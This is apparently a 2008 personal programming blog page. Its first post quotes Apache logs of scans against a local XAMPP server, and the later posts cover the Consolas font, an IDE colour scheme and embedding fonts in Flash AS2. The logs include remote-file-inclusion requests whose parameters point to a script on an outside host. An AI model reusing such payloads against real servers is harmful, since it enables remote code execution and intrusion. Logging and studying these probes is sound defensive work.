Saturday 29 November 2008

File System Security - Part I

Hello,

Today I am going to talk about file system security on a webserver Because I got a few attemps to hack my local XAMPP server.

I went to the apache log and I saw something quite interesting:
Access.log:
200.69.177.20 - - [27/Nov/2008:16:19:53 +0000] "GET //user/templates/footer.tpl HTTP/1.1" 404 1122
222.208.183.218 - - [28/Nov/2008:09:51:56 +0000] "GET http://www.nassc.com/pr.php HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /errors.php?error=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:04:03 +0000] "GET /admin/business_inc/saveserver.php?thisdir=http://87.230.27.224/phpsqliteadmin/js_.txt? HTTP/1.1" 404 1122
212.32.55.77 - - [28/Nov/2008:18:20:14 +0000] "GET /upload.php HTTP/1.1" 404 1122
216.55.83.12 - - [29/Nov/2008:08:15:55 +0000] "GET /phpmyadmin/main.php HTTP/1.0" 200 3071
222.208.183.218 - - [29/Nov/2008:11:16:36 +0000] "GET http://www.wantsfly.com/prx1.php?hash=047CB197FF160516516CE156005088B4C955CE39C55F HTTP/1.0" 404 1125
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /sqlitemanager/main.php HTTP/1.1" 404 1122
212.32.55.77 - - [29/Nov/2008:13:48:59 +0000] "GET /SQLiteManager/main.php HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:31 +0000] "GET //README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:32 +0000] "GET /horde2//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde3//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:33 +0000] "GET /horde-3.0.5//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.6//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:37 +0000] "GET /horde-3.0.7//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.8//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:38 +0000] "GET /horde-3.0.9//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /mail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:39 +0000] "GET /email//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /webmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:40 +0000] "GET /newmail//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mails//README HTTP/1.1" 404 1122
196.41.26.67 - - [04/Dec/2008:12:28:41 +0000] "GET /mailz//README HTTP/1.1" 404 1122
81.180.165.131 - - [05/Dec/2008:08:37:43 +0000] "GET /twiki/ HTTP/1.0" 404 1122
81.180.165.131 - - [05/Dec/2008:09:17:52 +0000] "GET /wiki/ HTTP/1.0" 404 1122
218.58.226.13 - - [07/Dec/2008:07:21:54 +0000] "GET /manager/html HTTP/1.1" 404 1122


And error.log:
[Thu Nov 27 16:19:53 2008] [error] [client 200.69.177.20] File does not exist: F:/xampp/htdocs/user
[Fri Nov 28 09:51:57 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/pr.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/errors.php' not found or unable to stat
[Fri Nov 28 18:04:03 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/admin
[Fri Nov 28 18:20:14 2008] [error] [client 212.32.55.77] script 'F:/xampp/htdocs/upload.php' not found or unable to stat
[Sat Nov 29 11:16:36 2008] [error] [client 222.208.183.218] script 'F:/xampp/htdocs/prx1.php' not found or unable to stat
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/sqlitemanager
[Sat Nov 29 13:48:59 2008] [error] [client 212.32.55.77] File does not exist: F:/xampp/htdocs/SQLiteManager
[Wed Dec 03 18:44:21 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/PMA
[Wed Dec 03 18:44:25 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/db
[Wed Dec 03 18:44:28 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/dbadmin
[Wed Dec 03 18:44:29 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/web
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:32 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpmyadmin2
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysqladmin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/mysql-admin
[Wed Dec 03 18:44:33 2008] [error] [client 212.98.241.114] script 'F:/xampp/htdocs/main.php' not found or unable to stat
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.6
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.4
[Wed Dec 03 18:44:34 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.5.1
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.3
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.2.6
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/myadmin
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0
[Wed Dec 03 18:44:35 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.0-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-pl1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.3-rc1
[Wed Dec 03 18:44:36 2008] [error] [client 212.98.241.114] File does not exist: F:/xampp/htdocs/phpMyAdmin-2.6.2-rc1
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantisbt
[Thu Dec 04 11:25:01 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/tracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtracker
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugtrack
[Thu Dec 04 11:25:02 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/support
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bug
[Thu Dec 04 11:25:03 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/bugs
[Thu Dec 04 11:25:04 2008] [error] [client 64.203.107.100] File does not exist: F:/xampp/htdocs/mantis


So I came to the conclusion to not use those files or folders.
Lucky It is a server to upload our own tests and nothing could happen anyway. :)

Whenever I find more security tips I will post them on the blog, I hope it helps to stop hackers.

Wednesday 15 October 2008

Nice environments for programming

I have been working with a horrendous IDEs for a long time My eyes hurt sometimes last year and I had to drop artificial tears on my eyes for about 8 months because I worked too hard for a periood of two months working about 12 hours a day everyday using 2 monitors (17" + 22")...
How did I solve my problem?: I worked less , and my eyes started to recover.

Sometimes we have tight deadlines or we are enjoying creating something nice. So we dont want to stop even when we feel the eyes are suffering... Yesterday I thought that was enough! So I started researching about good environments for programming... not GUIs, just the environment. (colour and font)

So I rememember I friend told me about font " Consolas " so I decided to have a try. But hey I need Windows Vista for that , they dont let you download it for free anywhere. So I reseacrhed... I found that If you install MS Powerpoint viewer 2007 it will install the fonts for free! Yay!

After installing it I had the fonts on WindowsXP, cool. .. first step done.

Now I have to activate the annoying ClearType... , I come from the MSX times I like pixelated fonts:

But I thought maybe now is time to go to the smooth generation fonts! So I enabled clearType... I didn't like it at the beginning but then I got used to it and it is fine.

Then I went to my Flash GUI and changed all colours I did it quite randomly but with a bit of common sense I came up with a nice colour scheme. Mixed with Consolas and ClearType I got a VERY nice envorinment that is a pleasure to work with...

(click to enlarge)


So if we compare it to the windows xp flash ide default:
(click to enlarge)


I hope you think twice about using that white background of yours and have this a try...

The settings Im using are:

Colors:

Foreground: #FFFFFF
Keywords: #996600
Identifiers: #00CCFF
Background: #333333
Comments: #666666
Strings: #009900

Font:

Font: Consolas
Font size: 11

You can use any colours of course but remember to make them not to strong...

I hope you can tell me a better combinations if you find them :)

Wednesday 9 April 2008

Embedding dynamic fonts on Flash AS2

EDIT: READ THIS ONE INSTEAD, IT IS BETTER WRITTEN AND HAS BETTER INSTRUCTIONS.

IF YOU WANT TO GET LOST AND SEE WRONG EXAMPLES, GO AHEAD AND READ THIS ONE....



Today after a couple of years on and off (more off than on) researching about embeding fonts on flash. I found a real solution today. The solution was explained on a comment in another blog like nothing important, but I can tell you it made me a son, like we say in Spain when somebody (or something sometimes) do something you really needed for you.

then I carried on researching for shared libraries... Hmm you can't change the library dynamically. But can load flash files that has static libraries... I got me thinking.... I started realizing what was it...

I came with a solution probably it is what Matt said in that forum but at that moment I had not idea how to use libraries...

Anyway, this is how it works:
Step 1: The preloader loads the font1.swf that has as library the font1Embed.swf That means it has the font embeded and it can be used now.

Step 2: All the library components can be used on preloader.swf

Step 3: We load main.swf (we have everythng we need loaded) and main.swf can use the librar of "preloader.swf".

It is easy once you understand it.... The great thing is you can load any library dinamically.

I will explain how to get dynamic fonts right now, step by step:

Ingredients:

  • a SWF file for the preloader,
  • 2 SWFs per font
  • any SWF that uses the font.

Cooking Time:
  • 10 to 15 mintues.
  • and then 3 minutes per font.

Preparation:

Character sauce:
Create an empty flash file on AS2.0.
Create a text box with the flash GUI.
Select any font and embed the characters you want.
Convert that text box into a movie Clip, or better said: put the text inside a movieclip.

Normally when I cook texts I assign names to the instances on the stage as "label_txt" for the text and "text_mc" for the movieclip. You can tell what kind of object is everything with just checking "_mc" or "_txt".

When you have the convert to movieclip box on screen, click on Export for runtime sharing.
Assign it a nice Identifier to it, something that will be used as a generic name for all the fonts you want to embed, something like : "dynamicFont".
Click on the URL box and write the name that is going to be this SWF file will have when exported.

I suggest something that will make it you identify your files easily: "embedFont1.swf"

Leave it published on a folder for several minutes.


Font container:

Create another empty flash file on AS2.0.

And on library click in new Symbol and then click on "Import for runtime sharing" it will ask you for an URL and identifier. Place the same name of the SWF file you just exported in Step1, and use the same Identifier too. Can be any name for this new object and make sure it is a movieClip.

Export the Flash file to the same folder of before. use a name that will help you matching this file and the other exported file. It will get specially confusing when there are lots of other files in the same folder. So we will place a name like: "font1.swf"

We should have now two files on the folder:"
font1.swf" and "embedFont1.swf".


Preloader:

We need to load all of these fonts before the real flash movie begins. So we are going to create a preloader, load the fonts first and load the main movie afterwards.

I generateda FLA with some code for it. It is a simple loader. I place the code as I have told you I will explain everything!

on Frame 1:
this.createEmptyMovieClip ("loaderA_mc",0);
this.createEmptyMovieClip ("loaderB_mc",1);
loaderA_mc._visible = loaderB_mc._visible = false;

_global._font = "nameOfYourFont";
_global._fontID = "1";

//we load the font container movieClip.
this.loaderA_mc.loadMovie (font1.swf);

// to make it more dynamic i have added a variable called "_global._fontID", that is the number of your font. (1 in the example);
//this.loaderA_mc.loadMovie ("font"+_global._fontID+".swf");

this.onEnterFrame = this.preoloader;

function preoloader () {
if (this.loaderA_mc.getBytesLoaded () > 0) {
if (loaderA_mc.getBytesLoaded () == loaderA_mc.getBytesTotal ()) {
//when the font SWF file is loaded, it will load the mainmovie, but you dont need to do it really.
this.loaderA_mc.loadMovie ("mainMovie.swf");
//we destroy this onEnterFrame and we create new functionality for another onEnterFrame if you want another preloader for the mainmovie.
//this.onEnterFrame = this.preloaderB;

//if you just want to show the real file just write this:

//_level0.loadMovie ("
mainMovie.swf");
delete
this.onEnterFrame
}
}
}


Then on the main flash file you need to create all of this code in order to test it:

var my_fmt:TextFormat = new TextFormat();

my_fmt.font = _global._font ;
my_fmt.size = 40;

this.createTextField("my_txt", this.getNextHighestDepth(), 40, 40, 260, 160);
my_txt.wordWrap = true;
my_txt.embedFonts = true;
my_txt.text = "Hello Mundo";
my_txt.setTextFormat(my_fmt);
my_txt._rotation = 15;


Now you have to publish this test file as "mainMovie.swf" and the preloader as anyname.. "preloader.swf"?... all files need to be on the same folder.

Now if you publish all files with the correct names and folder , whenever you start the preloader it whould work.


Add glass sugar, and a smile, there you have what you have been looking for for ages!.


Original idea in: Odd hammer
Preloader and more information: Quasimondo.com

Thanks to you both.


Saturday 26 January 2008

Hello World

Hola me presento soy Jaime , un programador de ActionScript. Empezaré a poner mis cosillas en breve. Ya que me estan pasando muchas cosas en mi entorno digital. La escritura no es mi fuerte pero se hará lo que se pueda :)